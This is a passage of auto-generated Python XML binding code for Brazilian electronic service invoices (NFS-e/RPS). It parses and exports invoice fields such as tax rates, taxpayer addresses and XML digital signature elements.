outfile.write('<ns1:AliquotaCSLL>%s</ns1:AliquotaCSLL>%s' % (self.gds_format_float(self.AliquotaCSLL, input_name='AliquotaCSLL'), eol_))
if self.DescricaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DescricaoRPS>%s</ns1:DescricaoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DescricaoRPS), input_name='DescricaoRPS')), eol_))
if self.DDDPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DDDPrestador>%s</ns1:DDDPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DDDPrestador), input_name='DDDPrestador')), eol_))
if self.TelefonePrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TelefonePrestador>%s</ns1:TelefonePrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TelefonePrestador), input_name='TelefonePrestador')), eol_))
if self.DDDTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DDDTomador>%s</ns1:DDDTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DDDTomador), input_name='DDDTomador')), eol_))
if self.TelefoneTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TelefoneTomador>%s</ns1:TelefoneTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TelefoneTomador), input_name='TelefoneTomador')), eol_))
if self.MotCancelamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MotCancelamento>%s</ns1:MotCancelamento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MotCancelamento), input_name='MotCancelamento')), eol_))
if self.CPFCNPJIntermediario is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJIntermediario>%s</ns1:CPFCNPJIntermediario>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJIntermediario), input_name='CPFCNPJIntermediario')), eol_))
if self.Deducoes is not None:
self.Deducoes.export(outfile, level, namespace_, name_='Deducoes', pretty_print=pretty_print)
if self.Itens is not None:
self.Itens.export(outfile, level, namespace_, name_='Itens', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Assinatura':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Assinatura')
else:
bval_ = None
self.Assinatura = bval_
# validate type tpAssinatura
self.validate_tpAssinatura(self.Assinatura)
elif nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocialPrestador
self.validate_tpRazaoSocialPrestador(self.RazaoSocialPrestador)
elif nodeName_ == 'TipoRPS':
TipoRPS_ = child_.text
TipoRPS_ = self.gds_validate_string(TipoRPS_, node, 'TipoRPS')
self.TipoRPS = TipoRPS_
# validate type tpTipoRPS
self.validate_tpTipoRPS(self.TipoRPS)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'DataEmissaoRPS':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEmissaoRPS = dval_
elif nodeName_ == 'SituacaoRPS':
SituacaoRPS_ = child_.text
SituacaoRPS_ = self.gds_validate_string(SituacaoRPS_, node, 'SituacaoRPS')
self.SituacaoRPS = SituacaoRPS_
# validate type tpSituacaoRPS
self.validate_tpSituacaoRPS(self.SituacaoRPS)
elif nodeName_ == 'SerieRPSSubstituido':
SerieRPSSubstituido_ = child_.text
SerieRPSSubstituido_ = self.gds_validate_string(SerieRPSSubstituido_, node, 'SerieRPSSubstituido')
self.SerieRPSSubstituido = SerieRPSSubstituido_
# validate type tpSerieRPSSubstituido
self.validate_tpSerieRPSSubstituido(self.SerieRPSSubstituido)
elif nodeName_ == 'NumeroRPSSubstituido':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPSSubstituido')
self.NumeroRPSSubstituido = ival_
# validate type tpNumeroComZero
self.validate_tpNumeroComZero(self.NumeroRPSSubstituido)
elif nodeName_ == 'NumeroNFSeSubstituida':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFSeSubstituida')
self.NumeroNFSeSubstituida = ival_
# validate type tpNumeroComZero
self.validate_tpNumeroComZero(self.NumeroNFSeSubstituida)
elif nodeName_ == 'DataEmissaoNFSeSubstituida':
DataEmissaoNFSeSubstituida_ = child_.text
DataEmissaoNFSeSubstituida_ = self.gds_validate_string(DataEmissaoNFSeSubstituida_, node, 'DataEmissaoNFSeSubstituida')
self.DataEmissaoNFSeSubstituida = DataEmissaoNFSeSubstituida_
# validate type tpDataNulo
self.validate_tpDataNulo(self.DataEmissaoNFSeSubstituida)
elif nodeName_ == 'SeriePrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'SeriePrestacao')
self.SeriePrestacao = ival_
# validate type tpSeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
elif nodeName_ == 'InscricaoMunicipalTomador':
InscricaoMunicipalTomador_ = child_.text
InscricaoMunicipalTomador_ = self.gds_validate_string(InscricaoMunicipalTomador_, node, 'InscricaoMunicipalTomador')
self.InscricaoMunicipalTomador = InscricaoMunicipalTomador_
# validate type tpInscricaoMunicipalNulo
self.validate_tpInscricaoMunicipalNulo(self.InscricaoMunicipalTomador)
elif nodeName_ == 'CPFCNPJTomador':
CPFCNPJTomador_ = child_.text
CPFCNPJTomador_ = self.gds_validate_string(CPFCNPJTomador_, node, 'CPFCNPJTomador')
self.CPFCNPJTomador = CPFCNPJTomador_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
elif nodeName_ == 'RazaoSocialTomador':
RazaoSocialTomador_ = child_.text
RazaoSocialTomador_ = self.gds_validate_string(RazaoSocialTomador_, node, 'RazaoSocialTomador')
self.RazaoSocialTomador = RazaoSocialTomador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialTomador)
elif nodeName_ == 'DocTomadorEstrangeiro':
DocTomadorEstrangeiro_ = child_.text
DocTomadorEstrangeiro_ = self.gds_validate_string(DocTomadorEstrangeiro_, node, 'DocTomadorEstrangeiro')
self.DocTomadorEstrangeiro = DocTomadorEstrangeiro_
# validate type tpDocTomadorEstrangeiro
self.validate_tpDocTomadorEstrangeiro(self.DocTomadorEstrangeiro)
elif nodeName_ == 'TipoLogradouroTomador':
TipoLogradouroTomador_ = child_.text
TipoLogradouroTomador_ = self.gds_validate_string(TipoLogradouroTomador_, node, 'TipoLogradouroTomador')
self.TipoLogradouroTomador = TipoLogradouroTomador_
# validate type tpTipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouroTomador)
elif nodeName_ == 'LogradouroTomador':
LogradouroTomador_ = child_.text
LogradouroTomador_ = self.gds_validate_string(LogradouroTomador_, node, 'LogradouroTomador')
self.LogradouroTomador = LogradouroTomador_
# validate type tpLogradouro
self.validate_tpLogradouro(self.LogradouroTomador)
elif nodeName_ == 'NumeroEnderecoTomador':
NumeroEnderecoTomador_ = child_.text
NumeroEnderecoTomador_ = self.gds_validate_string(NumeroEnderecoTomador_, node, 'NumeroEnderecoTomador')
self.NumeroEnderecoTomador = NumeroEnderecoTomador_
# validate type tpNumeroEndereco
self.validate_tpNumeroEndereco(self.NumeroEnderecoTomador)
elif nodeName_ == 'ComplementoEnderecoTomador':
ComplementoEnderecoTomador_ = child_.text
ComplementoEnderecoTomador_ = self.gds_validate_string(ComplementoEnderecoTomador_, node, 'ComplementoEnderecoTomador')
self.ComplementoEnderecoTomador = ComplementoEnderecoTomador_
# validate type tpComplementoEndereco
self.validate_tpComplementoEndereco(self.ComplementoEnderecoTomador)
elif nodeName_ == 'TipoBairroTomador':
TipoBairroTomador_ = child_.text
TipoBairroTomador_ = self.gds_validate_string(TipoBairroTomador_, node, 'TipoBairroTomador')
self.TipoBairroTomador = TipoBairroTomador_
# validate type tpTipoBairro
self.validate_tpTipoBairro(self.TipoBairroTomador)
elif nodeName_ == 'BairroTomador':
BairroTomador_ = child_.text
BairroTomador_ = self.gds_validate_string(BairroTomador_, node, 'BairroTomador')
self.BairroTomador = BairroTomador_
# validate type tpBairro
self.validate_tpBairro(self.BairroTomador)
elif nodeName_ == 'CidadeTomador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CidadeTomador')
self.CidadeTomador = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.CidadeTomador)
elif nodeName_ == 'CidadeTomadorDescricao':
CidadeTomadorDescricao_ = child_.text
CidadeTomadorDescricao_ = self.gds_validate_string(CidadeTomadorDescricao_, node, 'CidadeTomadorDescricao')
self.CidadeTomadorDescricao = CidadeTomadorDescricao_
# validate type tpCidadeTomadorDescricao
self.validate_tpCidadeTomadorDescricao(self.CidadeTomadorDescricao)
elif nodeName_ == 'CEPTomador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CEPTomador')
self.CEPTomador = ival_
# validate type tpCEP
self.validate_tpCEP(self.CEPTomador)
elif nodeName_ == 'EmailTomador':
EmailTomador_ = child_.text
EmailTomador_ = self.gds_validate_string(EmailTomador_, node, 'EmailTomador')
self.EmailTomador = EmailTomador_
# validate type tpEmail
self.validate_tpEmail(self.EmailTomador)
elif nodeName_ == 'CodigoAtividade':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CodigoAtividade')
self.CodigoAtividade = ival_
# validate type tpCodigoAtividade
self.validate_tpCodigoAtividade(self.CodigoAtividade)
elif nodeName_ == 'AliquotaAtividade':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaAtividade')
self.AliquotaAtividade = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaAtividade)
elif nodeName_ == 'TipoRecolhimento':
TipoRecolhimento_ = child_.text
TipoRecolhimento_ = self.gds_validate_string(TipoRecolhimento_, node, 'TipoRecolhimento')
self.TipoRecolhimento = TipoRecolhimento_
# validate type tpTipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
elif nodeName_ == 'MunicipioPrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'MunicipioPrestacao')
self.MunicipioPrestacao = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.MunicipioPrestacao)
elif nodeName_ == 'MunicipioPrestacaoDescricao':
MunicipioPrestacaoDescricao_ = child_.text
MunicipioPrestacaoDescricao_ = self.gds_validate_string(MunicipioPrestacaoDescricao_, node, 'MunicipioPrestacaoDescricao')
self.MunicipioPrestacaoDescricao = MunicipioPrestacaoDescricao_
# validate type tpCidadeDescricao
self.validate_tpCidadeDescricao(self.MunicipioPrestacaoDescricao)
elif nodeName_ == 'Operacao':
Operacao_ = child_.text
Operacao_ = self.gds_validate_string(Operacao_, node, 'Operacao')
self.Operacao = Operacao_
# validate type tpOperacao
self.validate_tpOperacao(self.Operacao)
elif nodeName_ == 'Tributacao':
Tributacao_ = child_.text
Tributacao_ = self.gds_validate_string(Tributacao_, node, 'Tributacao')
self.Tributacao = Tributacao_
# validate type tpTributacao
self.validate_tpTributacao(self.Tributacao)
elif nodeName_ == 'ValorPIS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorPIS')
self.ValorPIS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorPIS)
elif nodeName_ == 'ValorCOFINS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorCOFINS')
self.ValorCOFINS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorCOFINS)
elif nodeName_ == 'ValorINSS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorINSS')
self.ValorINSS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorINSS)
elif nodeName_ == 'ValorIR':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorIR')
self.ValorIR = fval_
# validate type tpValor
self.validate_tpValor(self.ValorIR)
elif nodeName_ == 'ValorCSLL':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorCSLL')
self.ValorCSLL = fval_
# validate type tpValor
self.validate_tpValor(self.ValorCSLL)
elif nodeName_ == 'AliquotaPIS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaPIS')
self.AliquotaPIS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaPIS)
elif nodeName_ == 'AliquotaCOFINS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaCOFINS')
self.AliquotaCOFINS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaCOFINS)
elif nodeName_ == 'AliquotaINSS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaINSS')
self.AliquotaINSS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaINSS)
elif nodeName_ == 'AliquotaIR':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaIR')
self.AliquotaIR = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaIR)
elif nodeName_ == 'AliquotaCSLL':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaCSLL')
self.AliquotaCSLL = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaCSLL)
elif nodeName_ == 'DescricaoRPS':
DescricaoRPS_ = child_.text
DescricaoRPS_ = self.gds_validate_string(DescricaoRPS_, node, 'DescricaoRPS')
self.DescricaoRPS = DescricaoRPS_
# validate type tpDescricaoRPS
self.validate_tpDescricaoRPS(self.DescricaoRPS)
elif nodeName_ == 'DDDPrestador':
DDDPrestador_ = child_.text
DDDPrestador_ = self.gds_validate_string(DDDPrestador_, node, 'DDDPrestador')
self.DDDPrestador = DDDPrestador_
# validate type tpDDDNulo
self.validate_tpDDDNulo(self.DDDPrestador)
elif nodeName_ == 'TelefonePrestador':
TelefonePrestador_ = child_.text
TelefonePrestador_ = self.gds_validate_string(TelefonePrestador_, node, 'TelefonePrestador')
self.TelefonePrestador = TelefonePrestador_
# validate type tpFoneNulo
self.validate_tpFoneNulo(self.TelefonePrestador)
elif nodeName_ == 'DDDTomador':
DDDTomador_ = child_.text
DDDTomador_ = self.gds_validate_string(DDDTomador_, node, 'DDDTomador')
self.DDDTomador = DDDTomador_
# validate type tpDDDNulo
self.validate_tpDDDNulo(self.DDDTomador)
elif nodeName_ == 'TelefoneTomador':
TelefoneTomador_ = child_.text
TelefoneTomador_ = self.gds_validate_string(TelefoneTomador_, node, 'TelefoneTomador')
self.TelefoneTomador = TelefoneTomador_
# validate type tpFoneNulo
self.validate_tpFoneNulo(self.TelefoneTomador)
elif nodeName_ == 'MotCancelamento':
MotCancelamento_ = child_.text
MotCancelamento_ = self.gds_validate_string(MotCancelamento_, node, 'MotCancelamento')
self.MotCancelamento = MotCancelamento_
# validate type tpMotCancelamento
self.validate_tpMotCancelamento(self.MotCancelamento)
elif nodeName_ == 'CPFCNPJIntermediario':
CPFCNPJIntermediario_ = child_.text
CPFCNPJIntermediario_ = self.gds_validate_string(CPFCNPJIntermediario_, node, 'CPFCNPJIntermediario')
self.CPFCNPJIntermediario = CPFCNPJIntermediario_
# validate type tpCPFCNPJnulo
self.validate_tpCPFCNPJnulo(self.CPFCNPJIntermediario)
elif nodeName_ == 'Deducoes':
obj_ = tpListaDeducoes.factory()
obj_.build(child_)
self.Deducoes = obj_
obj_.original_tagname_ = 'Deducoes'
elif nodeName_ == 'Itens':
obj_ = tpListaItens.factory()
obj_.build(child_)
self.Itens = obj_
obj_.original_tagname_ = 'Itens'
# end class tpRPS
class SignatureType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, SignedInfo=None, SignatureValue=None, KeyInfo=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.SignedInfo = SignedInfo
self.SignatureValue = SignatureValue
self.KeyInfo = KeyInfo
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SignatureType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SignatureType.subclass:
return SignatureType.subclass(*args_, **kwargs_)
else:
return SignatureType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.SignedInfo is not None or
self.SignatureValue is not None or
self.KeyInfo is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='SignatureType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SignatureType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='SignatureType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='SignatureType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='SignatureType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.SignedInfo is not None:
self.SignedInfo.export(outfile, level, namespace_, name_='SignedInfo', pretty_print=pretty_print)
if self.SignatureValue is not None:
self.SignatureValue.export(outfile, level, namespace_, name_='SignatureValue', pretty_print=pretty_print)
if self.KeyInfo is not None:
self.KeyInfo.export(outfile, level, namespace_, name_='KeyInfo', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'SignedInfo':
obj_ = SignedInfoType.factory()
obj_.build(child_)
self.SignedInfo = obj_
obj_.original_tagname_ = 'SignedInfo'
elif nodeName_ == 'SignatureValue':
obj_ = SignatureValueType.factory()
obj_.build(child_)
self.SignatureValue = obj_
obj_.original_tagname_ = 'SignatureValue'
elif nodeName_ == 'KeyInfo':
obj_ = KeyInfoType.factory()
obj_.build(child_)
self.KeyInfo = obj_
obj_.original_tagname_ = 'KeyInfo'
# end class SignatureType
class SignatureValueType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, valueOf_=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SignatureValueType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SignatureValueType.subclass:
return SignatureValueType.subclass(*args_, **kwargs_)
else:
return SignatureValueType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='SignatureValueType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SignatureValueType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureValueType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='SignatureValueType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='SignatureValueType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='SignatureValueType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class SignatureValueType
class SignedInfoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, CanonicalizationMethod=None, SignatureMethod=None, Reference=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.CanonicalizationMethod = CanonicalizationMethod
self.SignatureMethod = SignatureMethod
self.Reference = Reference
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SignedInfoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SignedInfoType.subclass:
return SignedInfoType.subclass(*args_, **kwargs_)
else:
return SignedInfoType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.CanonicalizationMethod is not None or
self.SignatureMethod is not None or
self.Reference is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='SignedInfoType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SignedInfoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignedInfoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='SignedInfoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='SignedInfoType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='SignedInfoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.CanonicalizationMethod is not None:
self.CanonicalizationMethod.export(outfile, level, namespace_, name_='CanonicalizationMethod', pretty_print=pretty_print)
if self.SignatureMethod is not None:
self.SignatureMethod.export(outfile, level, namespace_, name_='SignatureMethod', pretty_print=pretty_print)
if self.Reference is not None:
self.Reference.export(outfile, level, namespace_, name_='Reference', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'CanonicalizationMethod':
obj_ = CanonicalizationMethodType.factory()
obj_.build(child_)
self.CanonicalizationMethod = obj_
obj_.original_tagname_ = 'CanonicalizationMethod'
elif nodeName_ == 'SignatureMethod':
obj_ = SignatureMethodType.factory()
obj_.build(child_)
self.SignatureMethod = obj_
obj_.original_tagname_ = 'SignatureMethod'
elif nodeName_ == 'Reference':
obj_ = ReferenceType.factory()
obj_.build(child_)
self.Reference = obj_
obj_.original_tagname_ = 'Reference'
# end class SignedInfoType
class ReferenceType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, URI=None, Type=None, Transforms=None, DigestMethod=None, DigestValue=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.URI = _cast(None, URI)
self.Type = _cast(None, Type)
self.Transforms = Transforms
self.DigestMethod = DigestMethod
self.DigestValue = DigestValue
self.validate_DigestValueType(self.DigestValue)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ReferenceType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ReferenceType.subclass:
return ReferenceType.subclass(*args_, **kwargs_)
else:
return ReferenceType(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_DigestValueType(self, value):
# Validate type DigestValueType, a restriction on base64Binary.
if value is not None and Validate_simpletypes_:
pass
def hasContent_(self):
if (
self.Transforms is not None or
self.DigestMethod is not None or
self.DigestValue is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='ReferenceType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ReferenceType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ReferenceType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
